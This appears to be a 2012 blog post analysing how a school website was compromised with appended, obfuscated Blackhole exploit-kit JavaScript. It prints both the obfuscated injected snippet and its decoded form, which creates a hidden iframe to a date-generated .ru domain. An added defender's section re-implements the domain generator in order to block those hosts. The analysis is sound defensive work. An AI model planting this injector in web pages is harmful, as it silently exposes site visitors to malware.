DAV Gandhinagar's website compromised, serving Malware
WARNING: Viewing this page might trigger an alarm in your antivirus software because of the nature of the code shown here. There is no live code on this page; the exploit code is reproduced only for explanation.
DAV Public School Gandhinagar's previous official website, http://www.davgn.org, was compromised earlier this week by unknown hackers and was found to be running the infamous Blackhole exploit kit, most likely to serve trojans.
UPDATE: DAVGN has changed its domain to http://www.davgandhinagar.com (the current official website, which looks clean as of 3rd Nov 2012).
So as soon as you visited the school website, your system would become infected with malware and similar threats. Below I discuss the infection that happened to the site.
Technical Analysis of the attack
Himanshu, an eleventh standard student of DAVGN, reported to me that his browser was showing the "Reported Attack Site" page instead of the regular school homepage when he tried to visit the school website.
When I visited the site I saw the same thing. See below.
So out of curiosity I ran a Sucuri SiteCheck scan to quickly check which files on the site were infected. The scan completed in a few seconds and displayed the result. See below.
You can clearly see that three JavaScript files were infected with malicious code. For analysis I downloaded all of them.
I found that all of the files were originally clean, but rogue code had been appended at the end of each file. See below.
The appended rogue JavaScript looked similar to the code used by the Blackhole exploit kit. The pictures above clearly show that the rogue code is heavily obfuscated.
Complete Snippet of Obfuscated Rogue JavaScript Code:
/*km0ae9gr6m*/
try {
  prototype % 2;
} catch (asd) {
  x = 2;
}
try {
  q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
  q.appendChild(q + "");
} catch (fwbewe) {
  i = 0;
  try {
    prototype * 5;
  } catch (z) {
    fr = "fromChar";
    f = [510, 702, 550, 594,
    --------------SNIP--------------------------
    192, 160, 192, 160, 750, 50,
    ];
    v = "eva";
  }
  if (v) e = window[v + "l"];
  w = f;
  s = [];
  r = String;
  z = ((e) ? "Code" : "");
  for (; 1776 - 5 + 5 > i; i += 1) {
    j = i;
    if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
  }
  if (f) e(s);
}
/*qhk6sa6g1c*/
When the above code runs, it decodes itself to:
function nextRandomNumber() {
  var hi = this.seed / this.Q;
  var lo = this.seed % this.Q;
  var test = this.A * lo - this.R * hi;
  if (test > 0) {
    this.seed = test;
  } else {
    this.seed = test + this.M;
  }
  return (this.seed * this.oneOverM);
}
function RandomNumberGenerator(unix) {
  var d = new Date(unix * 1000);
  var s = d.getHours() > 12 ? 1 : 0;
  this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
  this.A = 48271;
  this.M = 2147483647;
  this.Q = this.M / this.A;
  this.R = this.M % this.A;
  this.oneOverM = 1.0 / this.M;
  this.next = nextRandomNumber;
  return this;
}
function createRandomNumber(r, Min, Max) {
  return Math.round((Max - Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone) {
  var rand = new RandomNumberGenerator(unix);
  var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
  var str = '';
  for (var i = 0; i < length; i++) {
    str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  }
  return str + '.' + zone;
}
setTimeout(function () {
  try {
    if (typeof iframeWasCreated == "undefined") {
      iframeWasCreated = true;
      var unix = Math.round(+new Date() / 1000);
      var domainName = generatePseudoRandomString(unix, 16, 'ru');
      ifrm = document.createElement("IFRAME");
      ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
      ifrm.style.width = "0px";
      ifrm.style.height = "0px";
      ifrm.style.visibility = "hidden";
      document.body.appendChild(ifrm);
    }
  } catch (e) {}
}, 500);
This code silently creates a hidden iframe pointing to a pseudo-random domain generated by the code above. The domain is derived from the system's current month and day of the month, plus a flag for whether the local hour is past 12, fed through the small random number generator shown.
While I was analysing the code, the generated random domain was http://clkujrjqvexvbmoi.ru. The code creates the iframe with its src attribute pointing to http://clkujrjqvexvbmoi.ru/runforestrun?sid=botnet2
When I tried to contact that URL, I was redirected to http://includtraf.ru/in.cgi?7, which is known to host malware. At the time of analysis that domain was down, so no further analysis was done. See the snaps below.
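Because the domain depends only on the date and an after-noon flag, a defender can pre-compute the callback domains for a window of days and match them against DNS or proxy logs. The following is an added example (not code from the page or from the malware) that re-implements the decoded generator cleanly for that purpose; the sample dates and hostnames are constructed.

```javascript
// Added example: clean re-implementation of the decoded script's date-seeded
// domain generator, for pre-computing and matching expected callback domains.
const LETTERS = "abcdefghijklmnopqrstuvwxyz";

// Returns a next() function reproducing the payload's generator. The seed mixes
// month (0-11), day of month and an after-noon flag (getHours() > 12); the year
// is never used, so the same calendar day yields the same domain every year.
// A and M are Park-Miller's constants, but the payload divides in floating
// point rather than integer arithmetic, and that is kept here to match it.
function makeGenerator(month, day, afterNoon) {
  const A = 48271;
  const M = 2147483647;
  const Q = M / A;               // non-integer on purpose: mirrors the payload
  const R = M % A;
  let seed = 2345678901 + month * 0xFFFFFF + day * 0xFFFF + (afterNoon ? 0xFFF : 0);
  return function next() {
    const hi = seed / Q;
    const lo = seed % Q;
    const t = A * lo - R * hi;
    seed = t > 0 ? t : t + M;
    return seed / M;             // in (0, 1]
  };
}

// The hostname the payload would build for the given local-time components.
function dgaDomain(month, day, afterNoon, length = 16, zone = "ru") {
  const next = makeGenerator(month, day, afterNoon);
  let label = "";
  for (let i = 0; i < length; i++) {
    label += LETTERS[Math.round((LETTERS.length - 1) * next())];
  }
  return `${label}.${zone}`;
}

// Both domains possible on one calendar day (victims browsing before/after noon).
// Components are taken in local time, exactly as the victim's browser does, so
// compute them for every time zone your users sit in.
function domainsForDate(date) {
  return [false, true].map((pm) => dgaDomain(date.getMonth(), date.getDate(), pm));
}

// Detection: which observed hostnames (e.g. from DNS or proxy logs) equal an
// expected domain for any date in the window.
function findDgaHits(hostnames, dates) {
  const expected = new Set(dates.flatMap(domainsForDate));
  return hostnames.filter((h) => expected.has(h.toLowerCase()));
}

// Constructed sample: expected domains for the first three days of Nov 2012.
const sampleDays = [1, 2, 3].map((d) => new Date(2012, 10, d));
console.log(sampleDays.flatMap(domainsForDate));
```

Feeding the output of domainsForDate into a DNS sinkhole or proxy blocklist ahead of each day blocks the callback before the exploit kit landing page is ever reached.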
HTTP 302 Redirection by the malware hosting domain
http://includtraf.ru/in.cgi?7 Reported Infected By Google SafeBrowsing
Even though the domain is offline, it still poses a major threat, because nobody knows when it will start functioning again.
How was davgn.org hacked?
Good question. First of all, www.davgn.org runs on Plesk Panel, a site administration software suite. Recently a zero-day exploit for Plesk Panel started floating around the Internet, and the exploit code is being sold for around $8000 on dark markets. The exploit can compromise an entire server running Plesk Panel.
So the scenario might have been this: some hacker(s) noticed that the site was running a vulnerable version of Plesk Panel, used the zero-day exploit to compromise the server, and appended the Blackhole exploit code to all the JavaScript files to launch attacks on visitors.
Further Reading: http://www.infoworld.com/d/security/parallels-investigates-claims-of-plesk-vulnerability-following-wave-of-website-hacks-197730
That's all from my analysis, thanks for reading!
- Prakhar